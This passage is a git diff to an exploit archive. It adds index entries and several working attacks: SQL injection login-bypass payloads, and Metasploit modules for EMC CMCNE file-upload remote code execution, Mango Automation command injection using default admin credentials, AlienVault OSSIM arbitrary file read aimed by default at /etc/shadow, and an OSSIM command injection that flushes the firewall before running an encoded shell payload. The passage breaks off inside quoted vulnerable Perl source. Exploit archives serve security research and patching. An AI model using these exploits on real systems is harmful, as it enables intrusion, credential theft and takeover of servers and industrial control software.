diff --git a/files.csv b/files.csv
index 09d41e199..fedb755d9 100644
--- a/files.csv
+++ b/files.csv
@@ -15802,6 +15802,23 @@ id,file,description,date,author,platform,type,port
 42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
 42630,platforms/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
 42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375
+42683,platforms/windows/remote/42683.txt,"Mako Web Server 2.5 - Multiple Vulnerabilities",2017-09-13,hyp3rlinx,windows,remote,0
+42691,platforms/windows/remote/42691.rb,"ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
+42692,platforms/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal RCE (Metasploit)",2017-09-13,"James Fitts",php,remote,0
+42693,platforms/windows/remote/42693.rb,"Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
+42694,platforms/windows/remote/42694.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,46824
+42695,platforms/linux/remote/42695.rb,"Alienvault Open Source SIEM (OSSIM) < 4.8.0 -  'get_file' Information Disclosure (Metasploit)",2014-06-13,"James Fitts",linux,remote,0
+42696,platforms/windows/remote/42696.rb,"Motorola Netopia Netoctopus SDCS - Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,3814
+42697,platforms/linux/remote/42697.rb,"Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)",2014-08-14,"James Fitts",linux,remote,0
+42698,platforms/jsp/remote/42698.rb,"Infinite Automation Mango Automation - Command Injection (Metasploit)",2017-09-13,"James Fitts",jsp,remote,0
+42700,platforms/windows/remote/42700.rb,"Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
+42701,platforms/java/remote/42701.rb,"EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",java,remote,0
+42702,platforms/java/remote/42702.rb,"EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",java,remote,0
+42703,platforms/windows/remote/42703.rb,"Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
+42704,platforms/windows/remote/42704.rb,"Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
+42708,platforms/linux/remote/42708.rb,"Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007
+42709,platforms/linux/remote/42709.rb,"Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007
+42711,platforms/windows/remote/42711.txt,"Microsoft Windows .NET Framework - Remote Code Execution",2017-09-13,Voulnet,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38448,3 +38465,30 @@ id,file,description,date,author,platform,type,port
 42661,platforms/php/webapps/42661.txt,"FoodStar 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
 42662,platforms/php/webapps/42662.txt,"Gr8 Multiple Search Engine Script 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
 42663,platforms/php/webapps/42663.txt,"inClick Cloud Server 5.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
+42667,platforms/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42668,platforms/php/webapps/42668.txt,"ICMLM 2.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42669,platforms/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42670,platforms/php/webapps/42670.txt,"ICAuction 2.2 - 'id' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42671,platforms/php/webapps/42671.txt,"ICDoctor Appointment 1.3 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42672,platforms/php/webapps/42672.txt,"ICRestaurant software 1.4 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42673,platforms/php/webapps/42673.txt,"ICDutchAuction 1.2 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42674,platforms/php/webapps/42674.txt,"ICAutosales 2.2 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42675,platforms/php/webapps/42675.txt,"ICTraveling 2.2 - Authentication Bypass",2017-09-13,"Ihsan Sencan",php,webapps,0
+42677,platforms/php/webapps/42677.txt,"ICStudents 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42676,platforms/php/webapps/42676.txt,"ICClassifieds 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42678,platforms/php/webapps/42678.txt,"ICSurvey 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42679,platforms/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42680,platforms/php/webapps/42680.txt,"IC-T-Shirt 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42681,platforms/php/webapps/42681.txt,"ICProductConfigurator 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42682,platforms/php/webapps/42682.txt,"ICGrocery 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42684,platforms/php/webapps/42684.txt,"ICCallLimousine 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42685,platforms/php/webapps/42685.txt,"ICProjectBidding 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42686,platforms/php/webapps/42686.txt,"ICDental Clinic 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42687,platforms/aspx/webapps/42687.txt,"ICEstate 1.1 - 'id' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",aspx,webapps,0
+42688,platforms/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42689,platforms/php/webapps/42689.txt,"ICSiteBuilder 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42690,platforms/asp/webapps/42690.txt,"ICAffiliateTracking 1.1 - Authentication Bypass",2017-09-13,"Ihsan Sencan",asp,webapps,0
+42699,platforms/windows/webapps/42699.rb,"Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
+42705,platforms/windows/webapps/42705.rb,"Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
+42706,platforms/windows/webapps/42706.rb,"Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
+42707,platforms/windows/webapps/42707.txt,"Carel PlantVisor 2.4.4 - Directory Traversal",2011-09-13,"Luigi Auriemma",windows,webapps,0
diff --git a/platforms/asp/webapps/42690.txt b/platforms/asp/webapps/42690.txt
new file mode 100755
index 000000000..bf712e162
--- /dev/null
+++ b/platforms/asp/webapps/42690.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Affiliate Tracking Script 1.1 - Authentication Bypass
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/affiliates-tracking-script.htm
+# Demo: http://www.icloudcenter.com/demos/icaffiliatetracking/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/icaffiliatetracking/adminlogin.asp
+# 
+# User: 'or 1=1 or ''=' Pass: anything
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/aspx/webapps/42687.txt b/platforms/aspx/webapps/42687.txt
new file mode 100755
index 000000000..b5b70731e
--- /dev/null
+++ b/platforms/aspx/webapps/42687.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Real Estate Marketplace Site ASP.NET Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/real-estate-marketplace-site.htm
+# Demo: http://www.icloudcenter.com/demos/icestatemarket/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/details.aspx?id=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/java/remote/42701.rb b/platforms/java/remote/42701.rb
new file mode 100755
index 000000000..42d682f7b
--- /dev/null
+++ b/platforms/java/remote/42701.rb
@@ -0,0 +1,78 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'EMC CMCNE Inmservlets.war FileUploadController Remote Code Execution',
+			'Description'    => %q{
+				This module exploits a file upload vulnerability found in EMC 
+				Connectrix Manager Converged Network Edition <= 11.2.1. The file
+				upload vulnerability is triggered when sending a specially crafted
+				filename to the FileUploadController servlet found within the 
+				Inmservlets.war archive. This allows the attacker to upload a
+				specially crafted file which leads to remote code execution in the
+				context of the server user.
+			},
+			'Author'		 => [ 'james fitts' ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'ZDI', '13-280' ],
+					[ 'CVE', '2013-6810' ]
+				],
+			'Privileged'	=> true,
+			'Platform' 	=> 'win',
+			'Arch'	=> ARCH_JAVA,
+			'Targets'	=>
+				[
+					[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Dec 18 2013'))
+
+		register_options([
+			Opt::RPORT(80)
+		], self.class)
+	end
+
+	def exploit
+
+		peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
+		deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
+		jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
+		@jsp_name = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
+
+		data = Rex::MIME::Message.new
+		data.add_part("#{jsp}", nil, nil, "form-data; name=\"ftproot\"; filename=\"#{deploy}#{@jsp_name}\"")
+
+		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
+
+		print_status("#{peer} - Uploading the JSP Payload...")
+		res = send_request_cgi({
+            'method'    => 'POST',
+            'uri'       => normalize_uri("inmservlets", "FileUploadController"),
+            'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+            'data'      => post_data,
+			'headers'	=> {
+				'ROOTDIR'	=> "ftproot"
+			}
+        })
+
+		if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/
+			print_good("File uploaded successfully!")
+			print_status("Executing '#{@jsp_name}' now...")
+			res = send_request_cgi({
+				'method'	=> 'GET',
+				'uri'		=> normalize_uri("dcm-client", "#{@jsp_name}")
+			})
+		else
+			print_error("Does not look like the files were uploaded to #{peer}...")
+		end
+
+	end
+
+end
diff --git a/platforms/java/remote/42702.rb b/platforms/java/remote/42702.rb
new file mode 100755
index 000000000..59e1fca40
--- /dev/null
+++ b/platforms/java/remote/42702.rb
@@ -0,0 +1,78 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'EMC CMCNE FileUploadController Remote Code Execution',
+			'Description'    => %q{
+				This module exploits a fileupload vulnerability found in EMC
+				Connectrix Manager Converged Network Edition <= 11.2.1. The file
+				upload vulnerability is triggered when sending a specially crafted
+				filename to the FileUploadController servlet.  This allows the
+				attacker to upload a malicious jsp file to anywhere on the remote
+				file system.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'james fitts' ],
+			'References'     =>
+				[
+					[ 'ZDI', '13-279' ],
+					[ 'CVE', '2013-6810' ]
+				],
+			'Privileged'	=> true,
+			'Platform' 	=> 'win',
+			'Arch'	=> ARCH_JAVA,
+			'Targets'	=>
+				[
+					[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Dec 18 2013'))
+
+		register_options([
+			Opt::RPORT(80)
+		], self.class)
+	end
+
+	def exploit
+
+		peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
+		deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
+		jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
+		@jsp_name = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
+
+		data = Rex::MIME::Message.new
+        data.add_part("#{jsp}", "application/octet-stream", nil, "form-data; name=\"source\"; filename=\"#{deploy}#{@jsp_name}\"")
+		data.add_part("#{rand_text_alpha_upper(5)}", nil, nil, "form-data; name=\"driverFolderName\"")
+
+		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
+
+		print_status("#{peer} - Uploading the JSP Payload...")
+		res = send_request_cgi({
+            'method'    => 'POST',
+            'uri'       => normalize_uri("HttpFileUpload", "FileUploadController.do"),
+            'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+            'data'      => post_data
+        })
+
+		if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/
+            print_good("File uploaded successfully!")
+			print_status("Executing '#{@jsp_name}' now...")
+
+			res = send_request_cgi({
+				'method'	=> 'GET',
+				'uri'		=> normalize_uri("dcm-client", "#{@jsp_name}")
+			})
+
+        else
+            print_error("Does not look like the files were uploaded to #{peer}...")
+        end
+
+
+	end
+
+end
diff --git a/platforms/jsp/remote/42698.rb b/platforms/jsp/remote/42698.rb
new file mode 100755
index 000000000..3898fa630
--- /dev/null
+++ b/platforms/jsp/remote/42698.rb
@@ -0,0 +1,114 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Infinite Automation Mango Automation Command Injection',
+			'Description'    => %q{
+				This module exploits a command injection vulnerability found in Infinite
+				Automation Systems Mango Automation v2.5.0 - 2.6.0 beta (builds prior to
+				430).
+			},
+			'Author'         => [ 'james fitts' ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'CVE', '2015-7901' ],
+					[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-15-300-02' ]
+				],
+			'DisclosureDate' => 'Oct 28 2015'))
+
+		register_options(
+			[
+				Opt::RPORT(8080),
+				OptString.new('TARGETURI', [ false, 'Base path to Mango Automation', '/login.htm']),
+				OptString.new('CMD', [ false, 'The OS command to execute', 'calc.exe']),
+				OptString.new('USER', [true, 'The username to login with', 'admin']),
+				OptString.new('PASS', [true, 'The password to login with', 'admin']),
+			], self.class )
+	end
+
+	def do_login(user, pass)
+		uri =  normalize_uri(target_uri.path)
+		
+		res = send_request_cgi({
+			'method'	=>	'GET',
+			'uri'			=>	uri
+		})
+
+		if res.nil?
+			vprint_error("#{peer} - Connection timed out")
+			return :abort
+		end
+
+		cookie = res.headers['Set-Cookie']
+
+		print_status("Attempting to login with credentials '#{user}:#{pass}'")
+
+		res = send_request_cgi({
+			'method'	=>	'POST',
+			'uri'			=>	uri,
+			'cookie'	=>	cookie,
+			'vars_post'		=>	{
+				'username'	=>	user,
+				'password'	=>	pass,
+			}
+		})
+
+		if res.nil?
+			vprint_error("#{peer} - Connection timed out")
+			return :abort
+		end
+
+		location = res.headers['Location']
+		if res and res.headers and (location = res.headers['Location']) and location =~ /data_point_details.shtm/
+			print_good("#{peer} - Successful login: '#{user}:#{pass}'")
+		else
+			vprint_error("#{peer} - Bad login: '#{user}:#{pass}'")
+			return
+		end
+
+		return cookie
+		
+	end
+
+	def run
+		cookie = do_login(datastore['USER'], datastore['PASS'])
+
+		data =  "callCount=1&"
+		data << "page=%2Fevent_handlers.shtm&"
+		data << "httpSessionId=%0D%0A&"
+		data << "scriptSessionId=26D579040C1C11D2E21D1E5F321094E5866&"
+		data << "c0-scriptName=EventHandlersDwr&"
+		data << "c0-methodName=testProcessCommand&"
+		data << "c0-id=0&"
+		data << "c0-param0=string:c:\\windows\\system32\\cmd.exe /c #{datastore['CMD']}&"
+		data << "c0-param1=string:15&"
+		data << "batchId=24"
+
+		res = send_request_raw({
+			'method'	=>	'POST',
+			'uri'			=>	normalize_uri("dwr", "call", "plaincall", "EventHandlersDwr.testProcessCommand.dwr"),
+			'cookie'	=>	cookie.split(";")[0],
+			'ctype'		=>	"application/x-www-form-urlencoded",
+			'headers'	=>	{
+				'Origin'	=>	'null',
+				'Upgrade-Insecure-Requests'	=>	1,
+				'Connection'	=> "keep-alive"
+			},
+			'data'	=>	data,
+		}, 5)
+
+		if res.body =~ /org.directwebremoting.extend.MarshallException/
+			print_error("Something went wrong...")
+			puts res.body
+		elsif res.body =~ /Check your Tomcat console for process output/
+			print_good("Command executed successfully")
+		end
+
+	end
+end
diff --git a/platforms/linux/remote/42695.rb b/platforms/linux/remote/42695.rb
new file mode 100755
index 000000000..0963c2ce2
--- /dev/null
+++ b/platforms/linux/remote/42695.rb
@@ -0,0 +1,119 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize
+		super(
+			'Name'        => 'Alienvault OSSIM av-centerd Util.pm get_file Information Disclosure',
+			'Description' => %q{
+				This module exploits an information disclosure vulnerability found within the get_file
+				function in Util.pm. The vulnerability exists because of an unsanitized $r_file parameter
+				that allows for the leaking of arbitrary file information.
+			},
+			'References'  =>
+			[
+				[ 'CVE', '2014-4153' ],
+				[ 'ZDI', '14-207' ],
+				[ 'URL', 'http://forums.alienvault.com/discussion/2806' ],
+			],
+			'Author'      => [ 'james fitts' ],
+			'License'     => MSF_LICENSE,
+			'DisclosureDate' => 'Jun 13 2014')
+
+		register_options([
+			Opt::RPORT(40007),
+			OptBool.new('SSL',   [true, 'Use SSL', true]),
+			OptString.new('FILE', [ false, 'This is the file to download', '/etc/shadow'])
+		], self.class)
+	
+	end
+
+	def run
+
+		soap =  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
+		soap += "<soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n"
+		soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n"
+		soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n"
+		soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\">\r\n"
+		soap += "<soap:Body>\r\n"
+		soap += "<get_file xmlns=\"AV\/CC\/Util\">\r\n"
+		soap += "<c-gensym3 xsi:type=\"xsd:string\">All</c-gensym3>\r\n"
+		soap += "<c-gensym5 xsi:type=\"xsd:string\">423d7bea-cfbc-f7ea-fe52-272ff7ede3d2</c-gensym5>\r\n"
+		soap += "<c-gensym7 xsi:type=\"xsd:string\">#{datastore['RHOST']}</c-gensym7>\r\n"
+		soap += "<c-gensym9 xsi:type=\"xsd:string\">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>\r\n"
+		soap += "<c-gensym11 xsi:type=\"xsd:string\">#{datastore['FILE']}</c-gensym11>\r\n"
+		soap += "</get_file>\r\n"
+		soap += "</soap:Body>\r\n"
+		soap += "</soap:Envelope>\r\n"
+
+		res = send_request_cgi(
+			{
+				'uri'	=>	'/av-centerd',
+				'method'	=>	'POST',
+				'ctype'		=>	'text/xml; charset=UTF-8',
+				'data'		=>	soap,
+				'headers'	=>	{
+					'SOAPAction'	=>	"\"AV/CC/Util#get_file\""
+				}
+			}, 20)
+
+		if res && res.code == 200
+			print_good("Dumping contents of #{datastore['FILE']} now...")
+			data = res.body.scan(/(?<=xsi:type="soapenc:Array"><item xsi:type="xsd:string">)[\S\s]+<\/item><item xsi:type="xsd:string">/)
+			puts data[0].split("<")[0]
+		else
+			print_bad("Something went wrong...")
+		end
+
+	end
+
+end
+__END__
+
+/usr/share/alienvault-center/lib/AV/CC/Util.pm
+
+sub get_file {
+    my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file )
+        = @_;
+    my $file_content;
+
+    verbose_log_file(
+        "GET FILE      : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$nombre,$r_file)"
+    );
+
+    if ($r_file =~  /[;`\$\<\>\|]/) {
+        console_log_file("Not allowed r_file: $r_file in get_file\n");
+        my @ret = ("Error");
+        return \@ret;
+    }
+
+    if ( !-f "$r_file" ) {
+        #my @ret = ("Error");
+        verbose_log_file("Error file $r_file not found!");
+        # Return empty file if not exists
+        my @ret = ( "", "d41d8cd98f00b204e9800998ecf8427e", "$systemuuid" );
+        return \@ret;
+    }
+
+    my $md5sum = `md5sum $r_file | awk {'print \$1'}` if ( -f "$r_file" );
+
+    if ( open( my $ifh, $r_file ) ) {
+
+        binmode($ifh);
+        $file_content = do { local $/; <$ifh> };
+        close($ifh);
+
+        my @ret = ( "$file_content", "$md5sum", "$systemuuid" );
+        return \@ret;
+
+    }
+    else {
+        my @ret = ("Error");
+        verbose_log_file("Error file $r_file not found!");
+        return \@ret;
+
+    }
+
+}
diff --git a/platforms/linux/remote/42697.rb b/platforms/linux/remote/42697.rb
new file mode 100755
index 000000000..06ec61dc9
--- /dev/null
+++ b/platforms/linux/remote/42697.rb
@@ -0,0 +1,237 @@
+require 'msf/core'
+require 'rexml/document'
+
+class MetasploitModule < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include REXML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'Alienvault OSSIM av-centerd Command Injection get_license',
+			'Description'	=> %q{
+				This module exploits a command injection flaw found in the get_license
+				function found within Util.pm. The vulnerability is triggered due to an
+				unsanitized $license_type parameter passed to a string which is then
+				executed by the system.
+			},
+			'Author' => [ 'james fitts' ],
+			'License' => MSF_LICENSE,
+			'References' =>
+				[
+					[ 'CVE', '2014-5210' ],
+					[ 'ZDI', '14-294' ],
+					[ 'BID', '69239' ],
+					[ 'URL', 'https://www.alienvault.com/forums/discussion/2690' ]
+				],
+			'Privileged'	=> true,
+			'Platform'		=> 'unix',
+			'Arch'			=> ARCH_CMD,
+			'DefaultOptions' =>
+				{
+					'SSL' => true,
+				},
+			'Payload' =>
+				{
+					'Compat'	=> {
+						'RequiredCmd'	=> 'perl netcat-e openssl python gawk'
+					}
+				},
+			'DefaultTarget'	=> 0,
+			'Targets' =>
+				[
+					['Alienvault <= 4.7.0',{}]
+				],
+			'DisclosureDate' => 'Aug 14 2014'))
+
+			register_options([Opt::RPORT(40007)], self.class)
+	end
+
+	def check
+		version = ""
+		res = send_soap_request("get_dpkg")
+
+		if res &&
+			res.code == 200 &&
+			res.headers['SOAPServer'] &&
+			res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
+			res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
+
+			version = $1
+		end
+
+		if version.empty? || version >= "4.7.0"
+			return Exploit::CheckCode::Safe
+		else
+			return Exploit::CheckCode::Appears
+		end
+	end
+
+	def build_soap_request(method, pass)
+		xml = Document.new
+		xml.add_element(
+			"soap:Envelope",
+			{
+				"xmlns:xsi"						=> "http://www.w3.org/2001/XMLSchema-instance",
+				"xmlns:soapenc"				=> "http://schemas.xmlsoap.org/soap/encoding/",
+				"xmlns:xsd"						=> "http://www.w3.org/2001/XMLSchema",
+				"soap:encodingStyle"	=> "http://schemas.xmlsoap.org/soap/encoding/",
+				"xmlns:soap"					=> "http://schemas.xmlsoap.org/soap/envelope/"
+			})
+
+		body = xml.root.add_element("soap:Body")
+		m = body.add_element(method, { 'xmlns'	=> "AV/CC/Util" })
+
+		args = []
+		args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
+		args[0].text = "All"
+
+		args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
+		args[1].text = "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2"
+
+		args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
+		args[2].text = "#{datastore['RHOST']}"
+
+		args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
+		args[3].text = "#{rand_text_alpha(4 + rand(4))}"
+
+		args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
+		args[4].text = "#{rand_text_alpha(4 + rand(4))}"
+
+		if pass == '0'
+			args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
+			perl_payload =  "system(decode_base64"
+			perl_payload += "(\"#{Rex::Text.encode_base64("iptables --flush")}\"))"
+			args[5].text = "|perl -MMIME::Base64 -e '#{perl_payload}';"
+		elsif pass == '1'
+			args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
+			perl_payload =  "system(decode_base64"
+			perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
+			args[5].text = "|perl -MMIME::Base64 -e '#{perl_payload}';"
+		end
+
+		xml.to_s
+	end
+
+	def send_soap_request(method, timeout=20, action)
+		if action == 'disable'
+			soap = build_soap_request(method, '0')
+		elsif action == 'pop_shell'
+			soap = build_soap_request(method, '1')
+		end
+
+		res = send_request_cgi({
+			'uri'		=> '/av-centerd',
+			'method'	=> 'POST',
+			'ctype'		=> 'text/xml; charset=UTF-8',
+			'data'		=> soap,
+			'headers'	=> {
+				'SOAPAction'	=> "\"AV/CC/Util##{method}\""
+			}
+		}, timeout)
+
+		res
+	end
+
+	def exploit
+		print_status("Disabling firewall...")
+		send_soap_request("get_license", 1, "disable")
+
+		print_status("Popping shell...")
+		send_soap_request("get_license", 1, "pop_shell")
+	end
+end
+__END__
+
+/usr/share/alienvault-center/lib/AV/CC/Util.pm
+
+sub get_license() {
+    my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $license, $license_type ) = @_;
+    verbose_log_file(
+        "LICENSE $license_type:Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre,$license,$license_type)"
+    );
+
+    my $deb='/usr/share/ossim-installer/temp/avl.deb';
+    my $header='/usr/share/ossim-installer/temp/header';
+
+    unlink $deb if ( -f $deb ); #delete previous file if found
+    unlink $header if ( -f $header ); #delete previous file if found
+
+    my $user_agent_uuid = AV::uuid::get_uuid;
+       $SIG{CHLD} = 'DEFAULT';
+    my $license_encoded = uri_escape($license);
+    my $package = system ( "curl --proxy-anyauth -K /etc/curlrc --max-time 20 --user-agent $user_agent_uuid --dump-header $header -o $deb http://data.alienvault.com/avl/$license_type/?license=$license_encoded" );
+        $SIG{CHLD} = 'IGNORE';
+
+    my @out = q{};
+
+    if ( !-e $header || -z $header ) {
+        @out = ( '1', 'Imposible to connect. Please check your network configuration' );
+        unlink $header;
+        return \@out;
+    }
+
+    if ( -e $deb ) {
+
+        open HEADERFILE, "< $header" or die "Not  $!";
+        my @header_content = <HEADERFILE>;
+        close(HEADERFILE);
+        my $response_ok = 0;
+        foreach (@header_content) {
+
+            if ( $_ =~ / 200 OK/) {
+                $response_ok = 1;
+            }
+        }
+        if ( $response_ok == 0 ) {
+            @out = ( '1', 'Imposible to connect. Please check your network configuration' );
+            unlink $header;
+            unlink $deb;
+            return \@out;
+        }
+
+
+        $SIG{CHLD} = 'DEFAULT';
+        my $command = "/usr/bin/dpkg -i --force-confnew $deb";
+        verbose_log_file ("LICENSE $license_type: $command");
